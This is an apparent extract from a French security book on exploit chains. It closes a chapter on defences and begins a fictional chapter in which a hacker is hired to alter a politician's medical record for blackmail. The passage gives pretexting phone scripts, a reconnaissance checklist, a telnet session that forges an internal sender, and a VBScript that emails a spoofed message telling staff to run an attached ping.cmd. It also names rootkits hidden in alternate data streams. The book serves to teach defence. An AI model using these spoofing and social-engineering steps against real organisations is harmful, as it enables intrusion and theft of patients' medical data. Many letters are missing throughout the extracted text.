suite. 15. Phnix sest loign de sa cible de deux niveaux pour accder sa cible.

Chapitre 5

Chane dentreprises

187

Mesures de prvention
Cette section traite des diverses mesures de prvention que vous pouvez mettre en place pour vous protger de tels exploits en chane. Mesures de prvention contre la reconnaissance passive de votre entreprise quel point est-il important que le monde connaisse les partenaires de votre entreprise ou ses sous-traitants ? Le monde a-t-il besoin de savoir cela ? Quelles sont les entreprises partenaires vers lesquelles vous avez un lien sur votre site web dentreprise ? Si on suit ces liens, quelles informations donnent-elles librement sur leurs sites web ? Quelles sont vos politiques de scurit lorsque vous travaillez avec des entreprises partenaires ? Vos sous-traitants ou partenaires sont-ils aussi srieux et paranoaques quant la scurit que vous ltes vous-mme ? Combien de ces politiques peuvent tre transformes en exigences pour toute compagnie souhaitant faire des affaires avec vous ? Les attaques provenant de tierces parties de conance sont monnaie courante. Vous "devez" vous assurer que vos partenaires comprennent et respectent vos politiques de scurit, en particulier en ce qui concerne les informations publiques. Mesures de prvention contre lattaque dingnierie sociale Visu IQ Will Hynes de Visu IQ tait prt donner beaucoup trop dinformations. Les termes "sensibilisation la scurit" viennent lesprit. Will a offert toutes les informations Phnix et lui a donn des informations qui devraient tre rserves des clients. "Nous envoyons nos mises jour par FTP et nous nous assurons quils ont la bonne version grce une somme MD5 envoye par messagerie lectronique" reprsente beaucoup trop dinformations pour quelquun qui se contente de passer un coup de l. Mesures de prvention contre la reconnaissance sur le logiciel de Visu IQ Il devrait y avoir des mcanismes de protection dans le logiciel pour viter quil ne soit visible si facilement. En dautres termes, le code devrait tre plus difcile dchiffrer. Il existe de nombreuses solutions pour cela qui ne sont pas forcment trs chres de nos jours. Il existe mme des solutions libres et gratuites. Un mot : chiffrement.

188

Chanes dexploits

Mesures de prvention contre lattaque par Wi-Fi du rseau domestique de Quizzi Il semble que tous les articles et ouvrages crits sur la scurit sans-l, de nos jours, commencent par un unique conseil : nutilisez pas le chiffrement WEP. Ce conseil semble presque un clich, mais le WEP est toujours trs utilis. Plusieurs raisons contribuent cela, y compris le matriel et les logiciels qui ne prennent pas en charge WPA (par exemple, Windows XP sans SP2 ou sans correctif WPA). La vrit est que, mme avec WPA, utiliser une phrase de passe de moins de 14 caractres rend le cassage du WPA presque aussi trivial que casser du WEP. Mais notez galement que le cassage de WPA est nettement moins document que le cassage de WEP. Il suft de comparer les deux requtes "cracking WEP video" et "cracking WPA video" sur Google pour en tre convaincu. Lattaque dans laquelle Phnix utilise le nom dutilisateur et le mot de passe par dfaut du routeur est plus courante que le lecteur ne se limagine probablement. Jai effectu plusieurs tests dintrusion o de nombreux quipements, y compris des parefeu et routeurs, taient congurs avec les accs par dfaut ou des accs trs proches de ceux par dfaut. Rsultat : ne laissez pas les paramtres par dfaut de vos quipements. Imaginez que toutes les cls de Ford Focus soient les mmes : nimporte qui avec une cl de Ford Focus pourrait ouvrir et conduire toutes les Ford Focus du monde. Selon moi, tout point daccs devrait tre congur par dfaut avec un identiant dadministration et un mot de passe uniques. Mesures de prvention contre lattaque par keylogger Il faut ici garder son antivirus jour et, si possible, faire fonctionner un systme de dtection dintrusion sur lhte. Le plus gros problme, ici, est le rootkit que Phnix a install sur lordinateur de Quizzi, quil a infect sous Windows 2003 Server. Les rootkits peuvent tre impossibles dtecter. Hacker Defender est sorti depuis un certain temps, mais il est hautement personnalisable. Il existe plusieurs outils servant identier des rootkits. Rootkit Revealer est particulirement populaire. Il existe dautres outils commerciaux ou libres qui font ou prtendent faire la mme chose. Prenez garde, cependant, ne pas vous infecter vous-mme en utilisant un faux outil de dcouverte de rootkits.

Chapitre 5

Chane dentreprises

189

Conclusion
Nous ne pouvons pas souligner assez quel point les entreprises sont connectes et la conance aveugle que nous avons envers les entreprises qui nous donnent de largent. Ces attaques peuvent prendre un certain temps un novice, mais quelquun qui fait cela quotidiennement pourrait effectuer lattaque DNS/Wi-Fi/rootkit/keylogger en quelques minutes. Si vous regardez les trois entreprises impliques dans lattaque de Phnix, aucune ntait complice de lattaque. Ni lentreprise partenaire de Grethrip (Visu IQ) ni lentreprise partenaire du partenaire de Grethrip (Quizzi) navaient de mauvaises intentions, mais leurs scurits nettement plus laxistes ont cr un point de dpart parfait pour que Phnix puisse mettre en place son outil au sein de Grethrip. Dans un monde de rachats continuels dentreprises et de renouements divers, il est clair que la mutualisation de ressources et lexternalisation de certaines oprations et de certains services continueront pendant des annes, si ce nest jamais. Lauteur ne connat aucun soustraitant du ministre de la Dfense qui utiliserait, en toute connaissance de cause, un logiciel dun type qui code chez lui, dans un environnement de production ou dans un environnement scuris. Mais sil ntait pas au courant ? Visu IQ est une entreprise respectable et a mme des sommes de contrle dintgrit qui font partie du processus. Mais les mmes vrications ne sont pas appliques au sein de Quizzi. Il est impossible dimposer votre culture et vos politiques de scurit vos partenaires et leurs entreprises priphriques, mais vous pouvez envisager dajouter des clauses de scurit fortes dans vos contrats et vos partenariats. Sinon, vous pourriez bien trouver un jour le nom de votre entreprise dans les gros titres de tous les journaux nationaux. Pas cause dune ngligence de votre part, mais cause de celle dune entreprise laquelle vous faisiez conance.

6
Obtenir un accs physique des dossiers mdicaux
Scnario
Didier est coursier dans un des plus grands centres mdicaux de la rgion. Son travail quotidien consiste transporter des dossiers mdicaux vers et depuis dautres centres mdicaux. Il aide galement saisir des informations dans lapplication de dossiers informatiss lorsquil na rien dautre faire. Ce programme a t install il y a un an. Il est trs polyvalent et possde toutes les fonctionnalits : saisie dordonnances, gestion de documents, transcriptions, etc. Aprs quatre ans de travail dvou au centre mdical, Didier est bien accept du personnel mdical et de ladministration. Tout le monde le connat car il est une des seules personnes interagir avec une grande partie de lquipe quotidiennement. Rcemment, lambiance au bureau est devenue tendue et il a entendu quelques rumeurs la semaine passe propos de suppressions de crdits. On lui a dailleurs laiss entendre que son poste allait disparatre cause de ces suppressions. Il peut terminer la semaine et percevra des indemnits en fonction de son anciennet. Didier est dvast. Il est le seul subvenir aux besoins de sa femme et de ses deux enfants adolescents. Il a besoin de cet emploi : la mutuelle aide payer les factures mdicales de sa femme. Didier se souvient que, il y a plusieurs mois, un politicien en vue est venu au centre mdical. Aprs plusieurs tests, les rsultats ont montr quil avait une mauvaise grippe, mais aussi quil tait sropositif. Cette information na pas t rendue publique car elle aurait pu avoir un impact srieux sur sa carrire politique. Cependant,

192

Chanes dexploits

comme beaucoup dinformations juteuses, elle na pas mis longtemps transpirer dans tout le centre. Chantage ? Didier peut-il seulement penser cela ? Il rchit toute vitesse. Combien dargent vaut cette information, vendue aux mdias ou au politicien lui-mme ? Comment peut-il rcuprer les dossiers mdicaux et comment les exploiter lorsquils seront en sa possession ? Il se souvient avoir vu la tl un reportage sur des adolescents qui pouvaient pirater des ordinateurs. lpoque, a lavait amus : il ne comprenait pas pourquoi quiconque aurait voulu pirater un ordinateur. Maintenant, il sait. Didier contacte le politicien et arrive un accord : Didier modiera le dossier mdical de lhomme politique et en effacera toute mention de sropositivit en change dune somme importante dargent. Didier doit embaucher quelquun pour cette tche.
Loi relative aux droits des malades et la qualit du systme de sant La loi du 4 mars 2002 relative aux droits des malades et la qualit du systme de sant autorise les patients accder directement aux informations mdicales les concernant dtenues par les professionnels de sant.

La loi sur les informations mdicales est bien jolie, mais quen est-il si Didier veut modier un dossier mdical ? La loi permet aux patients daccder leurs informations personnelles et, dans une certaine mesure, dy faire corriger les erreurs ou omissions. Modier un diagnostic nest cependant pas autoris : cela ouvrirait la porte des fraudes lassurance ou, dans notre cas, des transactions nancires importantes. Si Didier pouvait accder au dossier mdical de lhomme politique, il pourrait utiliser ces informations comme levier contre ce personnage public.
Modification de dossiers mdicaux Le dossier mdical de la chanteuse de country Tammy Wynette a t vendu au National Enquirer pour 2 610 $. La sropositivit du champion de tennis Arthur Ashe a fait lobjet dune fuite dans la presse et a t publie dans les journaux. Si une personne voulait en assassiner une autre, elle pourrait modifier son dosage de potassium si elle savait que sa cible souffrait dinsuffisance cardiaque et que laugmentation de son taux de potassium tait dangereux. Cest certes digne de James Bond, mais possible.

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

193

Approche
Maintenant que vous comprenez mieux pourquoi quelquun pourrait vouloir obtenir, modier ou voler des dossiers mdicaux, voyons comment obtenir ou modier un dossier mdical informatis. Tout dabord, Didier aura besoin des comptences dun expert comptences dont il ne dispose pas. Il devra embaucher quelquun pour faire ce travail. Il aura besoin dun accs physique au dpartement des archives ou au moins un PC sur le rseau interne. Lemploy de Didier (un pirate nomm Phnix) aura plusieurs possibilits pour mener bien la transaction. Phnix va suivre les tapes suivantes pour accder au centre mdical et aux donnes : 1. utiliser de lingnierie sociale et simmiscer pour obtenir des informations de valeur sur linltration ; 2. crocheter des serrures et mettre en dfaut la biomtrique pour accder au site ; 3. accder aux chiers Windows via BackTrack pour rquisitionner un PC et modier les informations mdicales.

Pour plus dinformations


Les ordinateurs sont lobjet dattaques depuis des annes pour des raisons diverses, mais pas ncessairement celles dont nous parlons dans ce chapitre. La plupart des cybercrimes sont des actes gratuits de destruction ou de vol dinformations pour une vente ultrieure. Lorsquon considre le monde de la sant, les raisons dune attaque peuvent tre fort diffrentes.
m

Vol dinformations mdicales des ns nancires. Quelquun obtient un traitement mdical en utilisant votre nom ou dautres informations. Vol dinformations mdicales des ns criminelles. Vous tes tenu responsable pour le comportement criminel de quelquun dautre. Fraude la scurit sociale. Votre couverture mdicale est utilise par une tierce personne.

LITRC amricain (Identity Theft Resource Center, centre de ressources sur le vol didentit) a rapport une augmentation de 30 % des failles de scurit au premier trimestre 2008 par rapport la mme tude en 2007. Cette tude a galement prouv

194

Chanes dexploits

une augmentation de 13,8 % des fuites de dossiers mdicaux par rapport lanne prcdente. Ces statistiques sont appuyes par de nombreux rapports dincidents, comme lindique un article du Network World :
"En fvrier 2008, Tenet Healthcare, qui possde plus de 50 hpitaux dans une douzaine dtats, a rendu publique une faille dans leur scurit impliquant un ancien employ du service comptable au Texas, qui a plaid coupable pour le vol dinformations personnelles de patients. Il a t condamn 9 mois de prison. Dans une affaire dusurpation didentit Sarasota, Floride, en janvier 2008, un agent de nettoyage a accd aux chiers des patients dun mdecin anesthsiste qui louait un bureau HealthSouth Ridgelake Hospital et a plaid coupable pour la fraude consistant commander des cartes de crdit sur Internet en utilisant les informations personnelles des patients. Il a t condamn deux ans de prison. Les ordinateurs portables perdus et vols constituent galement un problme : dans les trois derniers mois seulement, ils ont men la publication dinformations personnelles concernant des patients ou des employs du Memorial Blood Center de Duluth (Minnesota), du Health Net de Mountain View (Californie), du Sutter Lakeside Hospital de Lakeside (Californie) et du West Penn Allegheny Health System."

Selon le numro du 20 novembre 2006 de Radiology Today : "Le vol didentit mdicale est un crime de plus en plus pratiqu dans ce pays, principalement parce que les informations dassurance sant sont une marchandise de valeur. Certains estiment que la valeur sur le march noir dun nom attach des dossiers mdicaux et dassurance peut monter 60 $, comparer aux 0,07 $ dun CV."

Chane dexploits
Cette section dtaille la chane dexploits de Phnix :
m m m m

ingnierie sociale et piggybacking ; accs physique ; accs Windows via Backtrack ; modication des informations mdicales.

Cette section se termine par un rsum de la chane dexploits.

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

195

Ingnierie sociale et piggybacking Phnix doit obtenir le dossier mdical de lhomme politique mentionn pour que Didier puisse le faire chanter. Phnix doit obtenir autant dinformations que possible propos des employs du centre mdical rgional et de leurs adresses physiques. Lorsquil disposera de ces informations, il les utilisera pour accder physiquement au btiment o sont stocks les dossiers. Une fois lintrieur, il exploitera un ordinateur local pour collecter les informations. Beaucoup de choses ont t crites propos de lingnierie sociale et du piggybacking, mais de nombreux profanes ne connaissent pas ces termes. LArt de la guerre de Sun Tzu nonce que "lorsque vous emploierez quelque artice, ce nest pas en invoquant les esprits, ni en prvoyant peu prs ce qui doit ou peut arriver, que vous russirez ; cest uniquement en sachant exactement, par le rapport dle de ceux dont vous vous servirez, la disposition des ennemis, eu gard ce que vous voulez quils fassent". Sun Tzu faisait rfrence aux espions qui rcuprent des informations chez lennemi, mais cela peut vraiment sappliquer lingnierie sociale. Selon Kevin Mitnick, dans LArt de la supercherie, "on dit dune personne quelle a recours la manipulation lorsquelle utilise linuence et la persuasion pour duper les gens en se faisant passer pour une personne quelle nest pas. In ne, le manipulateur sait exploiter autrui an dobtenir des renseignements, en saidant ou non de moyens technologiques". Lattaque ILOVEYOU tait un virus, mais utilisait lingnierie sociale pour exploiter la faiblesse motionnelle des gens curieux. La supercherie se trouve dans les mots "I love you". Lattaquant pousse le destinataire du message croire que quelquun laime et ouvrir la pice jointe. Le piggybacking est la seconde mthode. Il sagit daccder un canal de communication restreint en utilisant la session de quelquun dautre. Cest, du moins, la dnition informatique. Une autre dnition, plutt axe sur lingnierie sociale, est celle qui consiste suivre un individu de prs lorsquil passe une porte ou une barrire physique. Voyons la premire dnition. Lorsque Phnix passe devant un ordinateur connect, il prend la main sur la session courante et continue travailler. Ce scnario est un des Graals du piratage : sasseoir et commencer taper. Lancer les programmes accessibles par un utilisateur et utiliser son identit. Cest la mthode la plus simple, mais quen est-il si lutilisateur a un conomiseur dcran protg par un mot de passe pour verrouiller la station ? Phnix devra alors connatre le mot de passe de lutilisateur. Avec sufsamment de temps, il peut tre capable de le craquer.

196

Chanes dexploits

La seconde dnition ne demande que peu, voire pas, de comptences informatiques : elle demande des comptences en ingnierie sociale. Lassertion de base de lingnierie sociale est que les gens veulent aider et faire conance. Un excellent exemple de scnario pourrait se drouler comme suit : Phnix est trs encombr, il transporte un blocnotes, un classeur, une bote volumineuse et son djeuner. Il arrive la porte en mme temps quune autre personne et semble sur le point de tout faire tomber. Rapidement et sans hsitation, il demande la personne de lui ouvrir la porte pour lui venir en aide. La personne le fera probablement. La victime pourra demander Phnix qui il est, une fois lintrieur, mais une chose la fois : il est entr. Un autre scnario trs efcace est de shabiller et de se comporter comme un technicien du tlphone ou de llectricit. Phnix parle avec conviction et sans hsitation, et, avant que vous ne vous en rendiez compte, il a un accs complet au centre nvralgique de lorganisation : le placard de brassage du tlphone et du rseau.
INFO Il a t dit que les amateurs piratent et que les professionnels usent dingnierie sociale.

Pourquoi lingnierie sociale fonctionne-t-elle ? Les humains sont le maillon faible de toute organisation. Une organisation peut disposer des meilleurs et des plus coteux pare-feu, antivirus, systmes de prvention et de dtection dintrusion et appareils de scurit, mais il suft quune personne comme Phnix persuade un employ de lui donner son identiant et son mot de passe ou installe un point daccs non autoris, et aucun des contrles prcdemment cits ne sera efcace. Lingnierie sociale va aider Phnix obtenir des informations sur la cible avant de pouvoir y accder. Comme Phnix veut accder des dossiers de patients, il doit dabord rcuprer un maximum dinformations sur le centre mdical o ils se trouvent. La meilleure manire pour cela est de recourir lingnierie sociale.
Mots de passe Selon une tude europenne rcente, la question "Quel est votre mot de passe ?", 75 % des gens donnaient immdiatement linformation. 15 % de plus taient prts donner leur mot de passe suite lutilisation de techniques dingnierie sociale des plus rudimentaires. Les deux tiers des employs de lindustrie de la sant ont donn leur mot de passe un collgue dans lanne qui prcde et 75 % ont utilis le compte dautres personnes de lquipe en cas de ncessit.

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

197

Que doit savoir Phnix avant dattaquer ? Il sagit de ltape de reconnaissance. Elle peut prendre plusieurs semaines pour obtenir sufsamment dinformations avant de monter une attaque. Voici une liste partielle de ce que Phnix doit savoir avant dattaquer :
m m m m m m m m m m m m m m m m m m m

noms ; prsence sur Internet ; numros de tlphone ; horaires douverture ; types de procdures mdicales ; personnel informatique ; fournisseurs extrieurs ; types de logiciels ; systmes dexploitation ; prestataire commercial ; sites web ; adresses de courrier lectronique et leur format ; plannings de congs ; bureaux et sites ; points dentre ; scurit physique et contrle daccs ; organigrammes ; emplacement de la salle o sont stocks les dossiers ; rpondeur automatique.

Les sections suivantes dcrivent comment Phnix parvient obtenir ces informations.
Noms Phnix doit obtenir un maximum de noms dans lentreprise. Pourquoi et comment ? Il a besoin des noms pour contacter une personne spcique ou pour se faire passer pour elle. Essayer de convaincre un salari de lentreprise quil sappelle Jean Martin alors quil ny a pas de Jean Martin dans lentreprise ne fonctionnera pas. Cela est la base

198

Chanes dexploits

de lingnierie sociale. Il existe de nombreuses mthodes pour obtenir des informations dune entreprise. Phnix prend dabord loption directe et se contente de poser la question ouvertement. Le rceptionniste ne demande souvent pas mieux que de dire qui est le responsable du dpartement des ressources humaines ou du service informatique. Phnix a remarqu quavoir lair perdu, hbt ou confus tait une bonne manire dobtenir de laide. Vouloir aider son prochain fait partie de la nature humaine. Une autre technique qui fonctionne bien est daccder au systme tlphonique et dajuster en fonction lidentiant de lappelant. Si, pendant sa reconnaissance, Phnix trouve des numros internes, il peut modier son identiant dappel pour quil corresponde ce numro interne. Il obtiendra bien plus de rponses en paraissant appeler depuis un numro interne. Si cela ne fonctionne pas, il peut aussi fouiller les poubelles. Il doit rcuprer tous les morceaux de papier quil pourra trouver. Il doit ensuite tout ramener dans un endroit sr et les compulser. Ce processus peut prendre des jours, mais peut rvler beaucoup dinformations utiles. Phnix est souvent merveill par ses dcouvertes dans les poubelles. Il a trouv des joyaux dinformations tels que des annuaires dentreprise, des organigrammes, des budgets et des plannings de congs. Fantmette appellerait cela du travail de dtective. Phnix a maintenant des noms et des numros de tlphone.
Prsence sur Internet Phnix doit faire quelques recherches sur Internet. En allant sur le site web de lentreprise, Phnix devrait trouver un numro de tlphone global sur la page de contact. Il peut ensuite lancer un simple nslookup :
nslookup > Set type=any > centremedicalregional.org Server: host.anyonesdnsservers.com Address: 1.1.1.1 centremedicalregional.org primary name server = ns0.anyonesdnsservers.com responsible mail addr = dns.anyonesdnsservers.com serial = 2003010113 refresh = 43200 (12 hours) retry = 3600 (1 hour) expire = 1209600 (14 days) default TTL = 180 (3 mins) centremedicalregional.org nameserver = ns1.anyonesdnsservers.com centremedicalregional.org nameserver = ns2.anyonesdnsservers.com centremedicalregional.org nameserver = ns3.anyonesdnsservers.com centremedicalregional.org

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

199

Internet address = 2.2.2.2 centremedicalregional.org MX preference = 10, mail exchanger = mail.centremedicalregional.org mail.centremedicalregional.org Internet address = 2.2.2.2 >

Cette rponse nslookup offre plusieurs informations. Le centre mdical hberge-t-il son courrier lectronique ? O ses pages web sont-elles hberges ? Aprs avoir lanc nslookup, Phnix peut lancer la commande telnet pour savoir ce quil peut en tirer. On appelle cela la recherche dempreintes (footprinting).
telnet mail.centremedicalregional.org 220 mail.regionalcarecenter.org Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830 ready at Mon, 26 Feb 2007 12:50:01 -0400

Il obtient comme rponse que le centre mdical rgional hberge son courrier sur un serveur Microsoft.
Collecte dinformations Vous avez besoin de numros de tlphone pour lancer une attaque par ingnierie sociale par tlphone. Supposons que, pendant sa reconnaissance sur le site web, Phnix ait remarqu que le centre mdical rgional avait plusieurs branches et un site administratif grant plusieurs villes. Il peut maintenant passer quelques coups de l. Voici un exemple de conversation tlphonique :

"Centre mdical rgional, bonjour ! Je suis Marie, comment puis-je vous aider ? Bonjour Marie ! Je suis pass votre centre, rue des Ormes, pour quelques tests, et jai besoin de mon dossier. qui dois-je madresser ? Vous devez vous adresser au service des dossiers. Souhaitez-vous que je vous mette en relation avec le service ? Oui, merci." Lappel de Phnix est transfr. "Service des dossiers, bonjour. Bonjour, qui suis-je en train de parler ? Tho. Que puis-je pour vous ? Jai besoin dune copie de mon dossier mdical.

200

Chanes dexploits

Votre nom, je vous prie ? Jean Martin. Dsol monsieur, je ne trouve pas votre dossier. Quand tes-vous venu pour la dernire fois ? Hier. Pouvez-vous me donner votre numro de scurit sociale ? Je suis dsol, mais je ne donne pas ce type dinformation au tlphone. Je prfre venir vous voir pour rcuprer mon dossier. Puis-je avoir votre adresse ? 123 Grand-Rue, suite 203. Je vous remercie." Phnix raccroche. Il a obtenu deux noms. Il a appris que la recherche utilisait le numro de scurit sociale et il connat le lieu de stockage des dossiers. Le lendemain, il se rend au service des dossiers. En entrant, il prend note de tous les aspects du bureau : type et marque des serrures sur les portes, prsence dun systme dalarme et son fabricant, prsence dun systme de vidosurveillance et type de camras, sagit-il de camras numriques ou IP Chaque variante a ses failles. Alors que Phnix entre, il demande parler Tho. "Bonjour, je cherche Tho. Il nest pas l. Puis-je vous aider ? Probablement. Comment vous appelez-vous ? Ben. Bonjour Ben, jai besoin de mon dossier mdical. Quel est votre nom ? Jean Martin." Phnix peut maintenant regarder le type dordinateur et de systme dexploitation employ par Ben pour chercher le dossier. Il peut aussi essayer de voir le programme utilis pour accder aux dossiers, ainsi que lidentiant et le mot de passe saisis par Ben. "Je ne trouve pas votre dossier. Puis-je avoir votre numro de scurit sociale ?

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

201

Bien sr, il sagit du 1 82 08 75 010 342 86. Je suis dsol, monsieur, mais je ne trouve pas de dossier. Vous tes sr que vous utilisez ce truc correctement ? Cest quoi dailleurs, un Linux ? Non, cest un Windows, et il est encore plus lent que dhabitude. Peut-tre que vous nutilisez pas le programme correctement. a na pas lair dtre un programme trs performant. Il fonctionne trs bien. Cest SOAPware et cest un des meilleurs. Peut-tre que vous navez pas saisi votre identiant et votre mot de passe correctement. Ne vous nervez pas, je vais ressayer." Phnix est particulirement attentif cette fois. "Monsieur, je suis dsol mais il nest pas dans notre systme. quel centre tes-vous all ? Au centre mdical dpartemental sur lavenue des Cdres. Monsieur, je suis dsol, mais nous sommes le centre mdical rgional, pas le centre mdical dpartemental Je suis au mauvais endroit ? Oh, je suis confus ! Puis-je cependant utiliser vos toilettes ? Oui monsieur. Passez cette porte, puis deuxime porte droite. Merci." En se dirigeant vers les toilettes, Phnix remarque une porte avec un panneau Dossiers. Phnix vient deffectuer une reconnaissance de lentre du site administratif. Qua-t-il appris ? Il a obtenu le nom du systme dexploitation du PC, le nom du logiciel utilis par le bureau et un identiant et un mot de passe pour pntrer dans le logiciel SOAPware. Il a aussi remarqu quil ny avait ni camras ni systme dalarme. Il ny a apparemment quune seule porte, devant, et le btiment semble avoir un parking bien clair. Il contourne le btiment et trouve une aire de chargement et une porte mal claire. Phnix commence maintenant construire son subterfuge.
Horaires douverture Les horaires sont probablement simples trouver : Phnix na qu appeler et demander. Cest une information publique et elle se trouve mme peut-tre sur le site web ou sur la porte.

202

Chanes dexploits

Types de procdures mdicales Phnix doit savoir quelles procdures mdicales sa cible effectue pour que son attaque fonctionne. Si on lui demande lexamen mdical quil a subi, quil parle dun examen de la prostate et que le bureau est celui dun podologue, il nobtiendra probablement pas de rponse. Cest, encore une fois, une information facile obtenir : un simple coup de l ou une consultation du site web sufsent. Personnel informatique Cette information est un peu plus dlicate obtenir : les noms du personnel du service informatique sont rarement publics et lentreprise externalise peut-tre ce service. Pourquoi Phnix en a-t-il besoin ? Si Phnix envoie un employ un courrier lectronique provenant de ladresse du directeur du service informatique, il est presque sr que lemploy louvrira. Il peut usurper ladresse du directeur, attacher un chier et y cacher un rootkit comme Hacker Defender, FU ou Vanquish dans le ux de donnes alternatif. Comment obtenir un nom ? Comme dit prcdemment, vous serez surpris de ce quon peut obtenir en posant une simple question. Lors de ses appels et visites prcdents, Phnix a obtenu trois noms : Marie, Tho et Ben.

La conversation pourrait se drouler ainsi : "Centre mdical rgional, bonjour ! Je suis Marie, comment puis-je vous aider ? Salut Marie, Ben, du service des dossiers. Tu as une drle de voix, Ben. Jai rcupr un gros rhume, et je crois que mon PC aussi. Je suis tout seul ici et jai besoin du type du service informatique. Cest quoi son numro ? Ben, tu sais bien que cest le 2201. Ah oui, dsol. a doit tre le rhume. Merci." Appel suivant. "Centre mdical rgional, bonjour ! Je suis Marie, comment puis-je vous aider ? Bonjour, poste 2201, je vous prie. Un moment." "Service informatique, jcoute. Bonjour, je crois que jai compos un mauvais numro. Je suis compltement perdu, je suis nouveau Comment vous appelez-vous ? Je mappelle Marc, qui cherchez-vous joindre ?

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

203

Les ressources humaines. Cest le poste 2205. Oh, merci !" Phnix a maintenant le nom dune personne du service informatique.
Fournisseurs externes Pour tenter dobtenir un accs physique, une des mthodes serait de se faire passer pour un fournisseur. Il est facile davoir en bandoulire de quoi tester des lignes tlphoniques et de rentrer dans une entreprise. Les entreprises sont tellement habitues voir diverses personnes pour la maintenance lectrique et tlphonique que ce type de personnel est rarement arrt. Phnix recherche les fournisseurs de tlphone, Internet et nergie de la zone. Types de logiciel Lorsquil sest rendu sur place pour essayer dobtenir un dossier mdical, Phnix a pris note du systme dexploitation et du logiciel utiliss par lentreprise. Il existe de nombreux logiciels. Un des lments communs les plus courants est lutilisation de HL7 (Health Level 7) pour transmettre les donnes cliniques et administratives. Systme dexploitation Lentreprise fonctionne-t-elle sous Windows, UNIX, Linux ou sous un autre systme dexploitation ? Prestataire commercial Phnix doit retourner voir le site web. Cela lui dira peut-tre qui a conu le site web. Il peut avoir fouiller quelques poubelles ou effectuer un peu de reconnaissance web sur le prestataire commercial pour voir quelles informations il peut obtenir. Les communiqus de presse sont toujours de bonnes sources dinformations. Les entreprises font des communiqus pour les embauches rcentes, les promotions et pour de nombreuses informations prcieuses, bien quapparemment inoffensives. Sites web Phnix ne se limite pas au site web de lentreprise quil envisage dattaquer, mais explore galement celui de son prestataire commercial. Il peut ainsi obtenir des informations sur le fournisseur du logiciel utilis par sa cible.

204

Chanes dexploits

Adresses de courrier lectronique et leur format Celles-ci peuvent tre trs utiles. Si Phnix envoie un message dune personne de lentreprise partir de ladresse dune personne du service informatique, le destinataire louvrira. Comment usurper une adresse de courrier lectronique ? Cest trs simple :
telnet centremedicalregional.org 25 220 yoda.centremedicalregional.org ESMTP Novell helo xyz.com 250 yoda.centremedicalregional.org mail from: <marc@centremedicalregional.org> 250 2.1.0 marc@centremedicalregional.org....Sender OK rcpt to: <marie@centremedicalregional.org> 250 2.0.0 Ok Data 354 3.0.0 End Data with <CR><LF>.<CR><LF> Subject: Problmes de rseau "Merci de lancer le fichier attach: nous avons des problmes critiques de rseau et cela permettra disoler le problme." <CR><LF>.<CR><LF>

Lexemple prcdent est une dmonstration de la facilit avec laquelle Phnix pourrait usurper une adresse de courrier lectronique. Voici un petit script Visual Basic qui envoie un chier en pice jointe :
Set objEmail = CreateObject("CDO.Message") objEmail.From = "marc@centremedicalregional.org " objEmail.To = "marie@centremedicalregional.org " objEmail.Subject = "Problmes de rseau" objEmail.Textbody = "Merci de lancer le fichier joint qui lance une commande de diagnostic pour nous aider rsoudre le problme." objEmail.AddAttachment "C:\temp\ping.cmd" objEmail.Configuration.Fields.Item _ ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 objEmail.Configuration.Fields.Item _ ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = _ "smtpserver" objEmail.Configuration.Fields.Item _ ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 objEmail.Configuration.Fields.Update objEmail.Send

Si Phnix envoie le message prcdent quelquun de lorganisation de la part dune autre personne de lorganisation, le destinataire louvrira car le message semblera venir de Marc, du service informatique.
Planning de congs Les plannings de congs peuvent tre dlicats obtenir, mais savrer importants. Par exemple Phnix ne peut pas se faire passer pour Marc, du service informatique, si Marc est

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

205

en congs. Il peut avoir de la chance et trouver un planning de congs dans une poubelle, mais cela est peu probable. Que faire ? Lentreprise dispose peut-tre dun intranet. Certaines entreprises utilisent Microsoft SharePoint Server ou un autre produit quivalent pour grer les calendriers et contacts de lentreprise. Il peut essayer de le compromettre. Dautres chapitres prsentent des astuces qui peuvent aider Phnix. Une autre possibilit est dobtenir un accs physique. Les calendriers de lentreprise sont souvent afchs dans des zones communes comme les cuisines, salles de pause ou salles fumeur. Une mthode presque infaillible dobtenir des informations est de faire transfrer tous les courriers lectroniques un compte SMTP (Simple Mail Transfer Protocol) externe. Les plannings de congs et de nombreuses informations internes lentreprise sont envoys par courrier lectronique. Heureusement, Phnix a parl Marc et sait que celui-ci nest pas en congs.
Bureaux et sites Cette information est gnralement la plus directe obtenir. Points dentre Les points dentre sont les accs physiques aux bureaux. Phnix a besoin daccder la salle des dossiers. Combien de points dentre existe-t-il ? Lesquels sont les moins lumineux ? Lesquels sont plus ou moins scuriss ? Quy a-t-il dautre dans la salle des dossiers ? Est-ce une salle dun complexe mdical oprationnel 24 heures sur 24, 7 jours sur 7, ou un bureau spar ferm aprs 17 heures ? Si la salle des dossiers est ouverte et passante 24 heures sur 24, 7 jours sur 7, lentre implique des obstacles diffrents. Scurit physique et contrle daccs Une scurit quelconque est-elle en place ? Lentreprise emploie-t-elle des gardiens ? A-t-elle une surveillance vido ? Des dtections dintrusion et de mouvement ? Lentreprise utilise-t-elle des cartes daccs sans contact ? De la biomtrie ? Selon le niveau dexpertise, les contrles daccs physiques mis en uvre par lentreprise inuenceront le vecteur dattaque de Phnix. Organigrammes Les organigrammes peuvent fournir de nombreuses informations. Phnix va essayer de mettre la main sur un graphique qui contient les noms et postes de lentreprise car cela lui offrira la premire tape de toute usurpation didentit. Mme si lorganigramme ne liste que les postes, il est utile. Un attaquant utilisant lingnierie sociale qui a une

206

Chanes dexploits

bonne connaissance du personnel et des dpartements dune entreprise aura probablement de meilleurs rsultats quun attaquant qui ne dispose pas de ces informations. La plupart des employs supposent que quelquun qui connat bien lentreprise en fait forcment partie. Lorganigramme peut aussi indiquer Phnix si lentreprise a une quipe informatique interne.
